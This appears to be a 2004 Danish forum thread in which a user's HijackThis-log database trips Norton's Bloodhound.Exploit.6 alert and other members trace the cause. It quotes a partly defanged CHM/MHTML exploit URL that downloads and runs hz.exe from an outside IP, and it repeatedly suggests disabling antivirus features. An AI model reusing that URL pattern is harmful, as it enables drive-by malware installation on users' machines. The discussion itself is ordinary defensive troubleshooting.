/ Forside/ Teknologi / Internet / Sikkerhed / Spørgsmål
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Kan dette passe
Fra : 2100
Vist : 352 gange
100 point
Dato : 05-04-04 18:45

Jeg er ved at lave en database med dem som skal fixes fra logen HijackThis.
Efter at havde indsamlet mange, kommer mit Norton antivirus med en meddelse "ALARM"
adgang nægtet. Kilde: C:\Documents and Settings\Administrator\Application Data\Microsoft\Word\~WRD3469.tmp
Trussel: Bloodhound.Exploit.6
Advarsel passer på dette document som jeg sidder og arbejder med.
Vil det sige at jeg selv indfører virus på min PCer ved at lave dette. ???????????????

 
 
Kommentar
Fra : BjarneD


Dato : 05-04-04 18:50

Nej, men det kan være at type og indhold får Norton til at tro at det er noget skidt.

Kommentar
Fra : tedd


Dato : 05-04-04 18:54

Prøv at gå ind på windows update of office update! Opdater med de seneste sikkerheds patches!

Kommentar
Fra : tedd


Dato : 05-04-04 18:54

of = og

Kommentar
Fra : 2100


Dato : 05-04-04 19:03

Har lige prøvet tedd kommentat.

Windows Update: Der er ingen vigtige opdateringer i øjeblikket.
Dine Office-programmer behøver ingen opdateringer.


Kommentar
Fra : BjarneD


Dato : 05-04-04 19:07

Det er tydeligvis din autogem fra Word der er identificeret som noget skidt så med mindre du ved hvordan man laver virus så er det bare fordi der er et fragment af filen, der identificeres selv om det ikke er skadeligt.
Det er slet ikke unormalt når man håndterer navne på den måde du gør.

Kommentar
Fra : tedd


Dato : 05-04-04 19:42

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

By embedding a specially crafted URL in a Web page and having that URL refer to a CHM file containing an HTML file with scripts in it, an attacker could force the user who views the Web page with a vulnerable version of Internet Explorer to download and execute files.
Det er det her Norton reagerer på!



Kommentar
Fra : 2100


Dato : 05-04-04 19:57

tedd: prøv lige at oversætte som du forstår dette. Jeg forstår det sådan at der ligger en exe.fil i scripts

Kommentar
Fra : BjarneD


Dato : 05-04-04 20:03

Det er bare fra en søgning hos Symantec på filnavnet, og det kan man ikke regne med i dette tilfælde. Jeg har utallige gange oplevet at noget bliver erklæret for virus, trojan eller malware selv om det er noget jeg selv har lavet og det er fordi en virusscanner jo bare er fodret med nogle oplysninger, m en den har jo ingen intelligens og kan ikke skelne oplysninger fra hinanden.
F. eks. vil en heuristic scan netop gå efter ting der normalt kan genkendes som malware/virus, men man skal selv vurdere før man sletter hvilket da også er årsagen til at man kan vælge at anbringe filen et sikkert sted indtil man har fået opklaret hvad det er.

Kommentar
Fra : tedd


Dato : 05-04-04 20:06

Bruger du henvisning til et eller andet sted på internettet i det dokument?
Tror heller ikke det er det store Bjarne, sandsynligvis en falsk virus advarsel!

Kommentar
Fra : BjarneD


Dato : 05-04-04 20:17

Tedd>>Ja det er jo det jeg mener da der jo er en sammenhæng mellem den liste der er ved at blive lavet og advarslen.Det kan nemt tænkes, at hijackthis er brugt til at fjerne en backdoor og det er så det navn der kommer frem. Backdooor/trojan er jo ikke altid virus, men bare et smart program der åbner porte og hvis man bruger et ikke særligt kendt filtransmissions program kan man også komme ud for at dette kaldes backdoor fordi det netop arbejder på samme måde, men her er det bare under brugerens kontrol.


Kommentar
Fra : 2100


Dato : 05-04-04 20:56

Tedd: Nej jeg bruger ikke dokumentet til henvisning på nettet, bruger det kun til at tjekke log med for at se om der er noget som man selv kan fjerne her og nu.

Kommentar
Fra : BjarneD


Dato : 05-04-04 21:03

Det er nu nok også bare det at navnet identificeres i en tmp fil der er problemet. Den har jo ikke registreret det i den fil du rent faktisk arbejder med så det er nok kombinationen af navnet på backdoor'en og tmt extension der fremkalder advarslen.
Du kan jo prøve at slette tmp filen efter at have lagret din arbejdsfil normalt og så lave en skanning.

Kommentar
Fra : tedd


Dato : 05-04-04 22:22

Nej ikke en exe Bjarne! Det er noget som Norton tolker som en URL til en kendt bagdør, altså en internet adresse!
Nåhh! Nu ved jeg det! Det er en URL fra hijackit loggen Norton reagerer på! Bare rolig du har ingen backdoor!
Jep! Det er en url!

Kommentar
Fra : tedd


Dato : 05-04-04 22:23

Slå heuristic virusscan fra, så får du adgang!

Kommentar
Fra : 2100


Dato : 06-04-04 21:46

Bloodhound.Exploit.6 er der nogen som ved hvor denne bliver lagt i en HijackThis log og hvad den måske kalder sig. Vil havde den ud af min database, da denne generer mig meget.

Kommentar
Fra : BjarneD


Dato : 06-04-04 22:02

Hvis du ikke kan åbne databasen kunne du jo lige logge af nettet og lukke din virusscanner ned eller gør det i fejlsikret.
Det lyder godt nok utroligt at en logfil kan drille så meget, men du må have meget høj sikkerhed på.

Kommentar
Fra : tedd


Dato : 06-04-04 22:04

Der bliver ikke lagt bloodhound ind i din hijack log! Men der ligger et www eller http link i loggen, som Norton tolker som et link til bloodhound! Derfor får du advarslen! Norton skriver jo osse Trussel!!

Kommentar
Fra : tedd


Dato : 06-04-04 22:06

En log fil er ikke eksekverbar, så du vil under ingen omstændigheder kunne få virus eller trojans fra en logfil!

Kommentar
Fra : 2100


Dato : 06-04-04 22:12

Tror heller ikke at jeg har virus, men selve strengen generer mig så meget at Norton blokerer mig for at komme ind i databasen. Jeg har fundet en bagvej til at lukke databasen op i en anden program, men så er det lige hvilken streng jeg skal slette for at Norton tror den er væk.

Kommentar
Fra : BjarneD


Dato : 06-04-04 22:13

søg i databasen

Kommentar
Fra : tedd


Dato : 06-04-04 22:14

Tja du kan jo osse slå norton fra mens du arbejder med filen!

Kommentar
Fra : 2100


Dato : 06-04-04 22:15

Bjarne D: ja det er jo også det jeg vil, men kender jo ikke navnet du den streng som skal slettes.

Kommentar
Fra : BjarneD


Dato : 06-04-04 22:17

du kunne jo søge på bloodhound eller lignende

Kommentar
Fra : tedd


Dato : 06-04-04 22:20

Nej men nu er det jo en url! Så mange henvisninger til en webside kan der vel heller ikke ligge i en hijack log!

Kommentar
Fra : 2100


Dato : 06-04-04 22:23

tedd: jeg har over 600 henvisninger wedsider i databasen, bare jeg kunne huske hvilken der er kommet sidst ind, men det kan jeg ikke.

Kommentar
Fra : tedd


Dato : 06-04-04 22:27

Hvis din komputer ellers er renset og du ikke sidder og downloader snavs fra internettet mens du laver din database, så sker der jo ikke noget ved at slå Norton fra mens du arbejder med hijack logs! Så er du jo ude over problemet! Du kan osse slå heurisks virusscan fra i Norton!

Kommentar
Fra : BjarneD


Dato : 06-04-04 22:27

Det der med url har du da kun fra beskrivelse af den backdoor, Tedd, eller..?

Kommentar
Fra : tedd


Dato : 06-04-04 22:31

Næh det har jeg fra det link jeg skrev tidligere i dette spørgsmål!
Citat
The vulnerabilty results from the incorrect handling of HTML files embedded in CHM files. (CHM is the Microsoft-compiled HTML help format.)


Men måske har jeg misforstået det!




Kommentar
Fra : tedd


Dato : 06-04-04 22:32

Gentager lige :
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit .6.html

By embedding a specially crafted URL in a Web page and having that URL refer to a CHM file containing an HTML file with scripts in it, an attacker could force the user who views the Web page with a vulnerable version of Internet Explorer to download and execute files.
Det er det her Norton reagerer på!


Kommentar
Fra : 2100


Dato : 06-04-04 22:35

Måske jeg skulle prøve om jeg kan gøre alle URL Deaktive, men et stort stykke arbejde hvis man skal gøre det ved hvert enkelt.

Kommentar
Fra : BjarneD


Dato : 06-04-04 22:37

Ja Tedd, men hvis den bare tror at der er noget fordi navnet er indeholdt i log informationen, hvilket ikke er usandsynligt da en simpel backdoor jo ikke har den komplicerede opsætning som virus har.

Kommentar
Fra : tedd


Dato : 06-04-04 23:04

Jeg kunne forestille mig at norton reagerer på en henvisning til en hjemmeside! Denne hjemmeside indeholder så en exploit (bloodhound) som bliver en trussel hvis man ikke har opdateret sit system! Hijackit loggen indeholder denne henvisning, som sandsynligvis er noget hijackit mener der skal fjernes!

Kommentar
Fra : BjarneD


Dato : 06-04-04 23:14

Hmm

Kommentar
Fra : 2100


Dato : 07-04-04 12:06

Nu har jeg snart prøvet alt, men ingen ting hjælper. Jeg har prøvet at deaktiverer Norton Auto-Protect, ligeledes har jeg i Norton Auto-Protect undtagelsesliste indskrevet stien hvor databasen ligger. Men hver gang kommer Norton og nægter mig adgang vedr. denne virus som omtalt. Det er Norton Internet Security 2004 som jeg bruger.

Kommentar
Fra : tedd


Dato : 07-04-04 12:18

Har du prøvet at disable scriptblocking i Norton?

Kommentar
Fra : 2100


Dato : 07-04-04 12:24

tedd. har lige prøvet dette også, nægtet adgang.

Kommentar
Fra : 2100


Dato : 07-04-04 12:28

Hvis jeg indlæser filen i WordPad får jeg adgang, kunne jo skylles at Norton ikke scanner WordPad som den gør med Word. Men hvordan slår jeg så scanning på Word fra.

Kommentar
Fra : 2100


Dato : 07-04-04 12:32

tedd. du har ret i at det er en URL i databasen som Norton tror er virus.

Kommentar
Fra : tedd


Dato : 07-04-04 12:40

Godt hvilken url forøvrigt? bare skriv adressen uden http eller www

Kommentar
Fra : 2100


Dato : 07-04-04 12:44

tedd. selve adressen kender jeg ikke endnu, da jeg har taget alle 588 adresser ud med URL, for at se om det var der den var, og det er dette. Så det er noget træls noget at lige finde den ene som det er.

Kommentar
Fra : tedd


Dato : 07-04-04 12:46

Ok kan jeg godt forstå

Kommentar
Fra : 2100


Dato : 07-04-04 13:42

Fandt denne.
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!xxxx//209.8.161.56/buka.chm::/hz.exe

Så er spørgsmålet, hvordan kommer jeg ind i min database og får denne fjernet.

Kommentar
Fra : BjarneD


Dato : 07-04-04 13:58

Hvordan laver du databasen?
Hvis den er opbygget som normal database burde man kunne redigere den enkelte streng.

Kommentar
Fra : 2100


Dato : 07-04-04 14:06

BjarneD. Det er rigtig, men jeg bliver jo nægtet adgang til hele databasen, da denne streng stadig ligger der. Så det jeg gør nu er at flytte databasen over på en anden PCer hvor der ikke er Norton på, og gennem denne vej slette strengen, og så lægge den ind igen på sin plads. Lidt træls, men det virker.

Kommentar
Fra : BjarneD


Dato : 07-04-04 14:43

Ja surt show, men det er da nok en rimelig løsning.
Nu må du endelig fortælle hvordan det går for det er da lidt spændende med den slags problemer, ja det kan jeg sagtens sige

Kommentar
Fra : tedd


Dato : 07-04-04 14:46

WOW bare du søger på google efter hz.exe popper Norton op!!

Kommentar
Fra : tedd


Dato : 07-04-04 14:47

Men disabler jeg script blocking kan jeg godt søge!!

Kommentar
Fra : tedd


Dato : 07-04-04 14:49
Kommentar
Fra : BjarneD


Dato : 07-04-04 14:51

Det overrasker ikke mig fordi bagdøre er så simple, at de skal fanges på navnet når de ikke er aktive.

Kommentar
Fra : 2100


Dato : 07-04-04 14:54

En ting jeg får lært af dette er. Alle nye strenge med snavs først kommer i mappe for sig selv og derefter scannet, inden de kommer ind i databasen.

Kommentar
Fra : 2100


Dato : 07-04-04 14:57

I kan jo prøve om den streng jeg fandt, om også Norton hos jer virker på denne. De 4 xxxx ved i jo hvad det står for samt at der mangler :

Kommentar
Fra : BjarneD


Dato : 07-04-04 15:02

Jeg har ikke "fornøjelsen" af de der problemer fordi jeg bruger Norman NIC med Sandbox, der virker noget anderledes.

Kommentar
Fra : tedd


Dato : 07-04-04 15:09

Jep den virker her! behøver faktisk bare at skrive hz.exe som jeg allerede har lagt en kommentar ind om

Kommentar
Fra : 2100


Dato : 07-04-04 22:46

Så fik jeg endelig databasen til at køre igen uden brok fra Norton efter at strengen blev fjernet. Så en ting har man da lært, Norton scanner jo ikke mens man sidder og arbejder med databasen eller en dokument. Det er først når man vil åbne dette igen at der bliver scannet, og så er det jo forsendt hvis man har lagt en streng ind, som Norton tror er virus.

Kommentar
Fra : tedd


Dato : 07-04-04 22:50

Oh!! Du kan vel slå nortons scan af office dokumenter fra?? Det er jo nok der hunden ligger begravet?

Kommentar
Fra : tedd


Dato : 07-04-04 22:52

Jep du kan fjerne flueben i office plugin! Under miscellaneous!

Kommentar
Fra : 2100


Dato : 07-04-04 22:53

tedd. kikker lige

Kommentar
Fra : 2100


Dato : 07-04-04 22:57

tedd. hvor finder du lige dette

Kommentar
Fra : tedd


Dato : 07-04-04 23:00

Jeg har kun NAV. Ved ikke hvor man finder det i Norton security, men der må være en option med office!

Kommentar
Fra : BjarneD


Dato : 07-04-04 23:03

Det er vist godt man ikke har Norton! Nå men der er da lys forude nu. Så meget for så lidt

Kommentar
Fra : BjarneD


Dato : 07-04-04 23:04

Hvad med databasen når du er færdig? Var det ikke sjovere med en hjemmeside selv om der vist nok findes noget lignende på engelsk.

Kommentar
Fra : 2100


Dato : 07-04-04 23:06

Det er rigtig. Norton er meget god, men den vil bestemme for meget. Nå pyt

Kommentar
Fra : 2100


Dato : 07-04-04 23:08

BjarneD. Mener du at lægge den op på en hjemmeside, hvor andre kan havde gavn af denne.

Kommentar
Fra : BjarneD


Dato : 07-04-04 23:11

Ja, det lyder da nyttigt det du er i gang med. mange af de gode sider med tips og vejledninger er jo startet ved at en eller anden havde noget andre kunne bruge. Hvad mener du Tedd?

Det med Norton er rigtigt, men man kan jo ikke få både, og.

Kommentar
Fra : tedd


Dato : 07-04-04 23:17

Jo men så bliver arlet måske arbejdsløs! Hold da op en lang tråd det her har udviklet sig til

Kommentar
Fra : BjarneD


Dato : 07-04-04 23:21

Nej, Arlet eller Spywarefri skal nok blive ved med at have rigeligt, men der mangler bare en forklaring når de fixer. Ja jeg ved godt hvad de laver og det er slet ikke så mystisk endda. Det svære er netop, at kende snavset fra det regulære. Arlet sletter mange registreringer der ikke er snavs, men som bare er unødvendige, men det fortæller han ikke

Accepteret svar
Fra : tedd

Modtaget 100 point
Dato : 07-04-04 23:31

Ja det er jo så rigtigt som det er sagt!

Godkendelse af svar
Fra : 2100


Dato : 08-04-04 00:12

Tak for svaret tedd.
                        

Kommentar
Fra : tedd


Dato : 08-04-04 00:14

Det var så lidt! Dejligt når man osse selv lærer noget

Kommentar
Fra : 2100


Dato : 08-04-04 00:15

Mit sidste indlæg kom ikke med. Alle svar har været gode, så jeg takker mange gange. En god påske skal lyde herfra.

Du har følgende muligheder
Eftersom du ikke er logget ind i systemet, kan du ikke skrive et indlæg til dette spørgsmål.

Hvis du ikke allerede er registreret, kan du gratis blive medlem, ved at trykke på "Bliv medlem" ude i menuen.
Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408925
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste